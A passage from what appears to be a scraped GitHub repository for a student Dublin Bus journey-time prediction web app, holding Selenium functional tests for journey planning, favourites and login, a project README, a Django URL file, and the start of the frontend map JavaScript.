self.browser.find_element_by_id('inputOrigin')\n destinInput = self.browser.find_element_by_id('inputDestin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n destinInput.send_keys(\"Trinity College\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n \n time.sleep(3)\n self.browser.find_element_by_id('favouriteButton').click()\n time.sleep(1)\n\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\n self.assertEqual(favourite.objects.all().count(), 1)\n\n self.browser.find_element_by_id('favouriteButton').click()\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n def test_index_alreadyFavourite(self):\n demo_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Shankill, Dublin, Ireland',\n origin_lat = 53.2332663, \n origin_lon = -6.1237578, \n destin_name = 'East Wall, Dublin, Ireland', \n destin_lat = 53.3543216, \n destin_lon = -6.2341133,\n stops = 0\n )\n demo_favourite.save()\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n destinInput = self.browser.find_element_by_id('inputDestin')\n\n originInput.send_keys(\"Shankill, Dublin,\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n destinInput.send_keys(\"East Wall, Dublin,\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\nclass BusIndexFunctionalTests(StaticLiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.login_url = self.live_server_url + reverse(\"login\")\n\n stop1 = Stop(stop_id=\"8220DB000003\", stop_name=\"Dorset Street Lower, stop 14\", stop_lat=53.358531237878196, stop_lon = -6.2627765057086595)\n stop2 = Stop(stop_id=\"8220DB000014\", stop_name=\"Parnell Square West, stop 3\", stop_lat=53.352308551434895, stop_lon = -6.26381074216821)\n stop1.save()\n stop2.save()\n\n def tearDown(self) -> None:\n self.browser.close()\n\n\n def test_index_noOrigin_stop(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('stops-tab-btn').click()\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid first stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n def test_index_noDestin_stop(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid last stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n #This one can be somewhat temperamental\n def test_submitRoute_stop(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n destinInput = self.browser.find_element_by_id('inputLastStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n destinInput.send_keys(\"Parnell Square West, stop 3\")\n\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n\n def test_index_FavouriteButton_noOrigin_stop(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n\n self.browser.find_element_by_id('favouriteButton').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid first stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n\n def test_index_FavouriteButton_noDestin_stop(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n self.browser.find_element_by_id('favouriteButton').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid last stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n\n\n def test_index_favouriteButton_stop(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n destinInput = self.browser.find_element_by_id('inputLastStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n destinInput.send_keys(\"Parnell Square West, stop 3\")\n \n self.browser.find_element_by_id('favouriteButton').click()\n\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\n self.assertEqual(favourite.objects.all().count(), 1)\n\n self.browser.find_element_by_id('favouriteButton').click()\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n \n\n def test_index_alreadyFavourite_stop(self):\n bus_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Dorset Street Lower, stop 14',\n origin_lat = 53.358531237878196, \n origin_lon = -6.2627765057086595, \n destin_name = 'Parnell Square West, stop 3', \n destin_lat = 53.352308551434895, \n destin_lon = -6.26381074216821,\n stops = 1\n )\n\n bus_favourite.save()\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n destinInput = self.browser.find_element_by_id('inputLastStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n destinInput.send_keys(\"Parnell Square West, stop 3\")\n\n time.sleep(1)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\n \n" }, { "alpha_fraction": 0.7482961416244507, "alphanum_fraction": 0.7880141139030457, "avg_line_length": 87.58333587646484, "blob_id": "4dddd582c638264fad309a984a0ee50f58ca99e7", "content_id": "deca5943974a9a3c192f2eb5286a9eb5b83b9ce4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4255, "license_type": "no_license", "max_line_length": 784, "num_lines": 48, "path": "/README.md", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "# Dublin_Bus\nA Dublin Bus Web Application (optimised for mobile devices) capable of predicting accurate journey times. \n\nThis repository is in part fulfilment of the degree of MSc. in Computer Science (Conversion) for module COMP47360.\n\nGroup Name: Group 6 (the 3 amigos)\n\nGroup Members:\nRachel Courtney \nAmanda Hegarty \nAndrew McClean\n\nURL: https://bustimate.com/ OR https://137.43.49.41 \n\nGithub Repository: https://github.com/rachelcourtney/Dublin_Bus.git \n\n## Project Specification:\nBus companies produce schedules which contain generic travel times. For example, in the Dublin Bus Schedule, the estimated travel time from Dun Laoghaire to the Phoenix Park is 61 minutes (http://dublinbus.ie/Your-Journey1/Timetables/All-Timetables/46a-1/). Of course, there are many variables which determine how long the actual journey will take. Traffic conditions which are affected by the time of day, the day of the week, the month of the year and the weather play an important role in determining how long the journey will take. These factors along with the dynamic nature of the events on the road network make it difficult to efficiently plan trips on public transport modes which interact with other traffic.\n\n## The Solution:\nThis project involves analysing historic Dublin Bus data and weather data in order to create dynamic travel time estimates. Based on data analysis of historic Dublin Bus data, a system which when presented with any bus route, departure time, the day of the week, current weather condition, produces an accurate estimate of travel time for the complete route and sections of the route. Users should be able to interact with the system via a web-based interface which is optimised for mobile devices. When presented with any bus route, an origin stop and a destination stop, a time, a day of the week, current weather, the system should produce and display via the interface an accurate estimate of travel time for the selected journey.\n\n## Application Architecture:\nBustimate is a dynamic web application hosted by an apache server running on a Linux virtual machine provided by UCD for this purpose. The backend of the application was created using the python-based web framework, Django. The webpages that makeup the frontend of the application were made using the old reliables of HTML, Javascript, and CSS supplemented by the Bootstrap CSS framework and jQuery. \n\nThe application makes use of several APIs to obtain real time information. Cron tabs are used to periodically activate scrapers which collect hourly weather data from the OpenWeather API. A similar system is used to call the General Transit Feed Specification-Realtime (GTFS-R) API every 5 minutes for real time data on bus arrivals. The Google Maps API is used directly by the applications frontend to provide services such as a map, geolocation and route planning.\n\nA MySQL database, hosted on the same virtual machine is used to store Django models used by the back-end as well as data obtained from the aforementioned APIs. Journey time predictions are provided to the application using several XGBoost models correlating to each Dublin Bus Route. Weather data and other features are sent to the predictive models by the backend and journey time estimates are returned.\n\n![tech_stack](https://user-images.githubusercontent.com/67108526/130132134-1e20eba6-8c2f-4419-9ef6-8033cea5089c.png)\n\n## Demonstration of Application:\n\n### Index Page\nThe index page features a journey planner that allows users to plan their Dublin Bus journey, including estimated travel time and arrival time as well as a fare calculator.\n\n![index](https://user-images.githubusercontent.com/67108526/130132743-2f58ec97-5516-4773-8c90-4d785b12d8e0.gif)\n\n\n### Login and Favourites Features\nUsers can create accounts with Bustimate and save their frequent routes.\n\n![favorites:login](https://user-images.githubusercontent.com/67108526/130132885-8af7c994-aac5-4cb5-80fa-a40d7e8ae8b2.gif)\n\n### Twitter Feed\nBustimate's live Twitter feed from Dublin Bus notifies users of service interruptions and delays.\n\n![twitter](https://user-images.githubusercontent.com/67108526/130133073-a168a975-23e4-4ed6-afbf-d9b265cbe914.gif)\n\n\n\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 29, "blob_id": "73c0b89a4c8b01651c01310bb79502c7f21c70a1", "content_id": "88480206a7f5542e88cf5695a856e5f13e6c120e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 330, "license_type": "no_license", "max_line_length": 71, "num_lines": 11, "path": "/Dublin_Bus/Bus/urls.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('fetch_arrivals/', views.fetch_arrivals, name='arrivaltimes'),\n path('send_to_model', views.send_to_model, name='model'),\n url(r'^twitter$', views.twitter, name='twitter')\n\n]\n" }, { "alpha_fraction": 0.6141484975814819, "alphanum_fraction": 0.6176578998565674, "avg_line_length": 34.6184196472168, "blob_id": "090f47f95efb786e8edbafcae830c90450d58c9d", "content_id": "930b9a319e4f65017a6c8050d05f6252a3420be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5414, "license_type": "no_license", "max_line_length": 142, "num_lines": 152, "path": "/Dublin_Bus/functional_tests/tests_login.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\n\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\nimport time\n\n\nUser = auth.get_user_model()\n\nclass LoginFunctionalTests(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.index_url = self.live_server_url + reverse(\"index\")\n self.login_url = self.live_server_url + reverse(\"login\")\n self.register_url = self.live_server_url + reverse(\"register\")\n self.favourite_url = self.live_server_url + reverse(\"favourites\")\n\n def tearDown(self) -> None:\n self.browser.close()\n\n def test_login(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n #Goes to index\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('logoutButton').is_displayed()\n #idExists(self, 'logoutButton')\n )\n\n self.assertTrue(\n self.browser.find_element_by_id(\"fareCalculator\").is_displayed()\n #idExists(self, \"fareCalculator\")\n )\n\n\n def test_failed_login(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(\"badname\")\n\n self.browser.find_element_by_id('submitButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n self.assertTrue(\n self.browser.find_elements_by_class_name(\"errorBox\")[0].is_displayed()\n #classExists(self, \"errorBox\")\n )\n\n self.assertEquals(\n self.browser.find_elements_by_class_name(\"errorBox\")[0].text,\n \"Username OR Password is incorrect.\"\n )\n\n def test_register(self):\n self.browser.get(self.register_url)\n new_user = {\n 'username' : 'newguy',\n 'email' : '[email protected]',\n 'password' : 'testing1234',\n }\n \n self.browser.find_element_by_name(\"username\").send_keys(new_user['username'])\n self.browser.find_element_by_name(\"email\").send_keys(new_user['email'])\n self.browser.find_element_by_name(\"password1\").send_keys(new_user['password'])\n self.browser.find_element_by_name(\"password2\").send_keys(new_user['password'])\n\n self.browser.find_element_by_id('submitButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n self.assertTrue(\n self.browser.find_elements_by_class_name(\"successBox\")[0].is_displayed()\n #classExists(self, \"successBox\")\n )\n\n self.assertEquals(\n self.browser.find_elements_by_class_name(\"successBox\")[0].text,\n \"Account created for \" + new_user['username'] + \".\"\n )\n\n self.assertEqual(User.objects.all().count(), 2)\n\n def test_register_fail(self):\n self.browser.get(self.register_url)\n new_user = {\n 'username' : 'newguy',\n 'email' : '[email protected]',\n 'password1' : 'testing1234',\n 'password2' : 'otherpassword',\n }\n\n self.browser.find_element_by_name(\"username\").send_keys(new_user['username'])\n self.browser.find_element_by_name(\"email\").send_keys(new_user['email'])\n self.browser.find_element_by_name(\"password1\").send_keys(new_user['password1'])\n self.browser.find_element_by_name(\"password2\").send_keys(new_user['password2'])\n\n self.browser.find_element_by_id('submitButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.register_url\n )\n self.assertTrue(\n self.browser.find_elements_by_class_name(\"errorBox\")[0].is_displayed()\n #classExists(self, \"errorBox\")\n )\n\n self.assertEqual(User.objects.all().count(), 1)\n\n def test_register_password_rules(self):\n self.browser.get(self.register_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('passwordRulesButton').click()\n\n try: \n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"popover\"))\n )\n finally:\n self.assertEquals(\n self.browser.find_element_by_id('PasswordRules').text,\n \"Must contain at least 8 characters\\nCannot be entirely numeric\\nCannot be similar to other info\\nCannot be a common password\"\n )\n" }, { "alpha_fraction": 0.527085542678833, "alphanum_fraction": 0.5372248291969299, "avg_line_length": 32.917327880859375, "blob_id": "f1347ea146168ca6469b5a3bad44d3f8851db368", "content_id": "d6127b2b012b085697d1c8e3c43edbb307f3f1c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 38569, "license_type": "no_license", "max_line_length": 250, "num_lines": 1137, "path": "/Dublin_Bus/Bus/static/Bus/index.js", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "'use strict'; //to enable the use of let\nlet map;\nlet infoWindow;\nlet directionsService;\nlet directionsRenderer;\nlet geocoder;\n//list for storing reference to bus stop markers\nlet stopMarkers = {};\nlet stopMarkersArr = [];\nlet markerCluster;\nlet clusterStyles;\n//Inputs\nlet inputOrigin = document.getElementById(\"inputOrigin\");\nlet inputDestination = document.getElementById(\"inputDestin\");\nlet inputFirstStop = document.getElementById('inputFirstStop');\nlet inputLastStop = document.getElementById(\"inputLastStop\");\nlet inputTime = document.getElementById(\"time-dropdown\")\nlet autocompleteOrigin;\nlet autocompleteDestin;\n//Geolocation\nlet currentLocationOrigin = false;\nlet PositionOptions = {\n enableHighAccuracy: true,\n timeout: 5000,\n maximumAge: 0,\n};\n//Favourites\nlet isFavourite = false;\nlet currentFavourite;\n//Journey planner\nlet predictionDisplay;\nlet journeyDescription;\n//Polyline and icon options\nlet polylineCustomOptions;\nlet startIcon;\nlet endIcon;\nlet startMarker;\nlet endMarker;\n//Check if Logged in\nlet current_user = null;\n//Bus fares for calculator\nlet fares = false;\n// currentFavourite\nlet postedFavourite = false\n//stores bus departure time and travel time values for estimate arrival time\nlet time_tracker;\nlet duration_tracker = {};\nlet latest_departure = {};\nlet no_route = false;\n\n\n\n$.getJSON(\"./static/Bus/bus_fares.json\", function(data) {\n fares = data\n})\n\nfunction initMap() {\n\n let myLatLng = {\n lat: 53.350140,\n lng: -6.266155\n }; //set the latitude and longitude to Dublin\n\n map = new google.maps.Map(document.getElementById(\"map\"), {\n zoom: 14,\n center: myLatLng,\n mapTypeControl: false,\n streetViewControl: false,\n styles: [{\n stylers: [{\n saturation: -10\n }]\n },\n {\n featureType: \"administrative.land_parcel\",\n elementType: \"labels\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"landscape.man_made\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"poi\",\n elementType: \"labels.text\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"poi\",\n elementType: \"geometry\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"poi\",\n stylers: [{\n visibility: \"off\"\n }]\n },\n {\n featureType: \"road\",\n elementType: \"labels.icon\",\n stylers: [{\n visibility: \"on\"\n }],\n },\n {\n featureType: \"road.local\",\n elementType: \"labels\",\n stylers: [{\n visibility: \"on\"\n }],\n },\n {\n featureType: \"transit\",\n stylers: [{\n visibility: \"off\"\n }]\n },\n ],\n });\n\n //will be used to restrict autocomplete search box options, radius can be increased or decreased as needed\n var dublin_bounds = new google.maps.Circle({\n center: myLatLng,\n radius: 30000\n });\n\n //set up Polyline\n polylineCustomOptions = {\n strokeColor: '#05386B',\n strokeOpacity: 1.0,\n strokeWeight: 4,\n };\n\n //set up startMarker\n startMarker = new google.maps.Marker({\n label: {\n text: 'A',\n color: \"#05386B\",\n fontSize: \"12px\",\n fontWeight: \"bold\",\n }\n });\n //set up endIcon\n endMarker = new google.maps.Marker({\n label: {\n text: 'B',\n color: \"#05386B\",\n fontSize: \"12px\",\n fontWeight: \"bold\",\n }\n });\n\n // Setup Places Autocomplete Service\n // Set options for service\n // Need to add Dublin bounds to restrict search box\n const autocompleteOptions = {\n componentRestrictions: {\n country: [\"IE\"]\n },\n bounds: dublin_bounds.getBounds(),\n strictBounds: true,\n fields: [\"name\", \"geometry\", \"place_id\"], // Google charges per field\n };\n\n // Set idss of text-boxes attached to autocomplete\n autocompleteOrigin = new google.maps.places.Autocomplete(\n inputOrigin,\n autocompleteOptions\n );\n\n\n\n autocompleteDestin = new google.maps.places.Autocomplete(\n inputDestination,\n autocompleteOptions\n );\n\n //Make Directions Service object for getRoute\n directionsService = new google.maps.DirectionsService();\n //make start icon\n startIcon = {\n path: \"M0-48c-9.8 0-17.7 7.8-17.7 17.4 0 15.5 17.7 30.6 17.7 30.6s17.7-15.4 17.7-30.6c0-9.6-7.9-17.4-17.7-17.4z\",\n fillColor: '#FFAE42',\n fillOpacity: 1,\n scale: 0.65,\n labelOrigin: new google.maps.Point(0, -30),\n\n }\n //make end icon\n endIcon = {\n path: \"M0-48c-9.8 0-17.7 7.8-17.7 17.4 0 15.5 17.7 30.6 17.7 30.6s17.7-15.4 17.7-30.6c0-9.6-7.9-17.4-17.7-17.4z\",\n fillColor: '#FFAE42',\n fillOpacity: 1,\n scale: 0.65,\n labelOrigin: new google.maps.Point(0, -30),\n\n }\n\n\n\n // Make Directions Renderer object for getRoute\n directionsRenderer = new google.maps.DirectionsRenderer({\n polylineOptions: polylineCustomOptions,\n suppressMarkers: true,\n preserveViewport: false,\n });\n\n //make geocoder object for geolocation/journey planner feature\n geocoder = new google.maps.Geocoder();\n\n\n //This should not be in init_map\n\n //autocomplete listeners\n autocompleteOrigin.addListener(\"place_changed\", checkFavourite, false);\n autocompleteDestin.addListener(\"place_changed\", checkFavourite, false);\n\n if (typeof loadFavourite === \"function\") {\n loadFavourite()\n }\n}\n\n//Returns Data from origin/FirstStop and destination/LastStop inputs\nfunction getRouteData(warning = true) {\n var active_tab = document.querySelector('.tab-content .active');\n var route = {\n user: current_user\n }\n if (active_tab['id'] == \"locations-tab\") {\n route['stops'] = 0;\n route['origin_name'] = inputOrigin.value;\n route['destin_name'] = inputDestination.value;\n\n var destination = autocompleteDestin.getPlace();\n var origin = autocompleteOrigin.getPlace();\n\n if (!origin) {\n if (warning) {\n showWarning(\"Please use a valid starting point.\")\n };\n return false;\n } else if (!destination) {\n if (warning) {\n showWarning(\"Please use a valid destination.\")\n };\n return false;\n } else if (origin.place_id == destination.place_id) {\n if (warning) {\n showWarning(\"Origin and destination are identical.\")\n };\n return false;\n }\n\n route['origin_lat'] = origin.geometry.location.lat();\n route['origin_lon'] = origin.geometry.location.lng();\n\n route['destin_lat'] = destination.geometry.location.lat();\n route['destin_lon'] = destination.geometry.location.lng();\n } else {\n route['stops'] = 1;\n route['origin_name'] = inputFirstStop.value;\n route['destin_name'] = inputLastStop.value;\n\n var originLatLon = getStopData(route['origin_name'], stops);\n var destinationLatLon = getStopData(route['destin_name'], stops);\n if (!originLatLon) {\n if (warning) {\n showWarning(\"Please input a valid first stop.\")\n };\n return false;\n } else if (!destinationLatLon) {\n if (warning) {\n showWarning(\"Please input a valid last stop.\")\n };\n return false;\n } else if (route['origin_name'] == route['destin_name']) {\n if (warning) {\n showWarning(\"First and last stops are identical.\")\n };\n return false;\n }\n\n route['origin_lat'] = originLatLon['lat'];\n route['origin_lon'] = originLatLon['lng'];\n\n route['destin_lat'] = destinationLatLon['lat'];\n route['destin_lon'] = destinationLatLon['lng'];\n }\n return route\n}\n\nfunction formatTime(time) {\n var date = time.getDate();\n var month = time.getMonth() + 1;\n var year = time.getFullYear();\n var hour = time.getHours();\n var minute = time.getMinutes();\n\n if (date < 10) {\n date = '0' + date\n };\n if (month < 10) {\n month = '0' + month\n };\n if (hour < 10) {\n hour = '0' + hour\n };\n if (minute < 10) {\n minute = '0' + minute\n };\n\n time = year + '-' + month + '-' + date + 'T' + hour + ':' + minute;\n return time;\n}\n\n//Displays a warning message beneath button-group\nfunction showWarning(text) {\n var warningBox = document.getElementById('warning');\n warningBox.innerHTML = text;\n warningBox.style.display = 'block';\n}\n\n//Returns Co-ordinates of a stop when given it's name\nfunction getStopData(name, stop_list) {\n for (var i = 0; i < stop_list.length; i++) {\n if (stop_list[i]['fields']['stop_name'].replace(\"&#x27;\", \"'\") == name) {\n var StopLatLon = {\n lat: stop_list[i]['fields']['stop_lat'],\n lng: stop_list[i]['fields']['stop_lon'],\n };\n return StopLatLon;\n }\n }\n return false;\n};\n\n//Displays route and time estimates\nasync function getRoute(start, end, time) {\n //Clear Previous Route\n directionsRenderer.set('directions', null);\n directionsRenderer.setMap(null);\n document.getElementById('route_suggestions').innerHTML = \"\";\n document.getElementById('route_suggestions').style.visibility = \"hidden\";\n\n\n\n //request to Google Directions API\n const request = {\n origin: start,\n destination: end,\n travelMode: 'TRANSIT',\n transitOptions: {\n modes: ['BUS'],\n routingPreference: 'FEWER_TRANSFERS',\n departureTime: new Date(time),\n },\n unitSystem: google.maps.UnitSystem.METRIC\n }\n\n\n\n //clear markers from map so route can be seen\n clearMarkers();\n\n //Check if fare Calculator is on and get data if it is\n var CalcOn = (fare_suggestions.style.display === \"block\")\n if (CalcOn) {\n if (!fares) {\n showWarning(\"Unable to access fare data\")\n return;\n }\n\n var age = $('input[name=\"age\"]:checked').val();\n var payment = $('input[name=\"payment\"]:checked').val();\n\n if (!age) {\n showWarning(\"Enter Ticket Type.\")\n return;\n } else if (!payment) {\n showWarning(\"Do you have a leap card?\")\n return;\n }\n\n var total_cost = 0;\n }\n\n\n //make request and render route on map\n directionsService.route(request, async function(response, status) {\n if (status == \"OK\") {\n\n //set custom markers\n startMarker.setPosition(start);\n startMarker.setIcon(startIcon);\n startMarker.setMap(map);\n startMarker.setVisible(true);\n endMarker.setPosition(end);\n endMarker.setIcon(endIcon);\n endMarker.setMap(map);\n endMarker.setVisible(true);\n\n\n directionsRenderer.setDirections(response);\n directionsRenderer.setMap(map);\n infoWindow.close();\n\n\n var entire_journey = response.routes[0].legs[0].steps; //journey is held in leg[0]\n console.log(entire_journey);\n var route_suggestions = document.getElementById('route_suggestions');\n var divider = \"<hr class='divider'>\"\n //this variable is used to create ids for each step in a journey\n var i = 0;\n // used to store values for estimated arrival time\n latest_departure = {};\n duration_tracker = {};\n\n\n\n\n async function asyncForEach(array, callback) {\n for (let i = 0; i < array.length; i++) {\n if (no_route == true) {\n journeyDescription = \"This route is not served by Dublin Bus.<br>\";\n journeyDescription += divider;\n route_suggestions.innerHTML = journeyDescription;\n console.error(\"Doesn't Exist!\");\n directionsRenderer.set('directions', null);\n directionsRenderer.setMap(null);\n console.log(no_route);\n break;\n } else {\n await callback(array[i], i, array);\n }\n }\n\n\n }\n\n if (entire_journey.length == 1 && entire_journey[0].travel_mode == \"WALKING\") {\n await processJourney(entire_journey);\n document.getElementById('route_suggestions').style.visibility = \"visible\";\n }\n else {\n await processJourney(entire_journey).then((travel_time_values) =>\n displayEstimatedArrival(travel_time_values[0], travel_time_values[1], no_route));}\n\n\n\n\n //extract useful journey info from response and post to journey planner\n async function processJourney(entire_journey) {\n await asyncForEach(entire_journey, async (journey) => {\n //increments id for each step of journey\n i++;\n //assigns id to p element\n route_suggestions.innerHTML += \"<p id='\" + i + \"'</p>\";\n\n\n if (journey.travel_mode == \"TRANSIT\" && journey.transit.line.agencies[0].name == \"Dublin Bus\") {\n journeyDescription = \"<img src='../static/Bus/logo-smaller.png' class='img-fluid><i class='fas fa-bus-alt'></i> \" + journey.transit.line.short_name + ' | ';\n journeyDescription += \"<i class='fas fa-clock'></i> \" + journey.transit.departure_time.text + ' | ';\n\n var routeDetails = {};\n routeDetails['departure_time'] = journey.transit.departure_time.value.toISOString();\n routeDetails['line'] = journey.transit.line.short_name;\n routeDetails['departure_stop'] = journey.transit.departure_stop.name;\n routeDetails['arrival_stop'] = journey.transit.arrival_stop.name;\n routeDetails['num_stops'] = journey.transit.num_stops;\n routeDetails['dep_stop_lat'] = journey.transit.departure_stop.location.lat();\n routeDetails['dep_stop_lng'] = journey.transit.departure_stop.location.lng();\n 